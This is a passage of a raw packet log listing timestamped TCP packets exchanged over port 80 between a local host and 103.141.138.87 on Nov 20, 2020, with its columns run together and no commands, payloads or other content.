                              Nov 20, 2020 11:27:52.487519026 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.487526894 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.487536907 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.487557888 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.487567902 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.487586021 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.487601995 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.487612009 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.487622976 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.487637997 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.487643003 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.487660885 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.487673044 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.487684965 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.487692118 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.487709045 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.487719059 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.487737894 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.487744093 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.487759113 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.487771034 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.487787008 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.487792015 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.487807035 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.487818956 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.487835884 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.487840891 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.487855911 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.487868071 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.487880945 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.487889051 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.487905025 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.487916946 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.487930059 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.487946987 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.487953901 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.487961054 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.487977028 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.487982035 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.488009930 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.490420103 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.490451097 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.490466118 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.490485907 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.490504980 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.490519047 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.490525961 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.490552902 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.490559101 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.490577936 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.490600109 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.490605116 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.490623951 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.490636110 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.490643978 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.490664005 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.490683079 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.490689993 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.490700006 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.490717888 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.490725994 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.490747929 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.490761995 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.490777016 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.490784883 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.490803003 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.490814924 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.490829945 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.490838051 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.490856886 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.490864992 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.490885019 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.490895033 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.490916967 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.490926027 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.490947962 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.490967989 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.490977049 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.490989923 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491007090 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.491017103 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491035938 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.491049051 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491066933 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.491075993 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491095066 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.491105080 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491125107 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.491133928 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491153955 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.491166115 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491180897 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491192102 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.491213083 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.491231918 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491244078 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.491250038 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491270065 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.491281986 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491298914 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491308928 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.491328001 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.491345882 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491358995 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.491364956 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491385937 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.491398096 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491413116 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491424084 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.491445065 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.491462946 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491473913 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.491482973 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491507053 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.491516113 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491538048 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.491548061 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491569042 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.491575956 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491595030 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.491606951 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491624117 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491635084 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.491657019 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.491664886 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491678953 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491693020 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491700888 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.491724014 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.491739988 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491759062 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.491765022 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491787910 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.491796970 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491816044 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491830111 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.491853952 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.491874933 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491885900 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.491894007 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491914988 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.491925955 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491941929 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.491960049 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.491983891 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.492005110 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.492029905 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.492038012 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.492060900 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.492072105 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.492088079 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.492100954 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.492122889 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.492139101 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.492155075 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.492162943 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.492185116 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.492202044 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.492218018 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.492223978 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.492242098 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.492254972 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.492269039 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.492276907 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.492295027 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.492306948 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.492325068 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.495218039 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.495253086 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.495276928 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.495296001 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.495309114 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.495330095 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.495345116 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.495351076 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.495373964 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.495383978 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.495403051 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.495414019 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.495434046 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.495452881 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.495464087 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.495563030 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.495583057 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.495606899 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.495613098 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.495619059 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.495634079 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.495650053 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.495690107 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.500642061 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.500677109 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.500694036 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.500720024 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.500742912 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.500765085 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.500771046 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.500782967 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.500799894 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.500825882 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.500839949 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.500857115 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.500866890 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.500890017 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.500904083 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.500921965 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.500931978 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.500957012 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.500971079 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.500989914 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.500998020 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.501020908 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.501039028 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.501051903 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.501065016 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.501087904 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.501108885 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.501116991 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.501125097 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.501146078 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.501156092 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.501176119 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.501184940 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.501204967 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.501215935 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.501230955 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.501243114 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.501264095 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.501279116 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.501296043 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.501307964 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.501329899 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.501339912 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.501358032 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.501372099 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.501413107 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.501419067 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.501444101 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.501452923 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.501476049 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.501486063 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.501509905 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.501519918 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.501539946 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.501549006 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.501569033 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.501576900 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.501596928 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.501610041 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.501626968 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.501637936 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.501677990 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.504149914 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.504179955 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.504198074 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.504215956 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.504237890 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.504266977 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.504272938 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.504281044 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.504297972 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.504313946 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.504337072 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.504359961 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.504369974 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.504383087 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.504400015 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.504409075 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.504431009 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.504451036 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.504473925 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.504486084 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.504489899 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.504509926 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.504518032 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.504540920 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.504550934 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.504576921 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.504582882 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.504604101 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.504616976 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.504636049 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.504645109 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.504666090 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.504677057 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.504695892 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.504704952 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.504725933 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.504740953 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.504759073 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.504784107 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.504806042 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.504821062 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.504839897 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.504846096 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.504872084 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.504882097 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.504904032 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.504925966 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.504934072 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.504942894 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.504968882 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.504982948 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.505011082 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.505018950 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.505043983 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.505055904 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.505079031 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.505086899 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.505109072 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.505116940 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.505139112 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.505147934 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.505170107 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.505177975 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.505198956 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.505228996 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.505235910 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.505259991 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.505274057 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.505295038 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.505304098 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.505325079 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.505333900 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.505354881 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.505363941 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.505399942 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.505409002 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.505434036 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.505449057 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.505469084 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.505492926 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.505501032 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.505507946 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.505530119 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.505542040 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.505558014 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.505567074 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.505589962 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.505604029 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.505618095 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.505626917 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.505649090 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.505665064 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.505677938 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.505687952 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.505709887 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.505723953 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.505739927 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.512574911 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.707201958 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.707233906 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.707246065 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.707257986 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.707273960 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.707285881 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.707302094 CET8049167103.141.138.87192.168.2.22
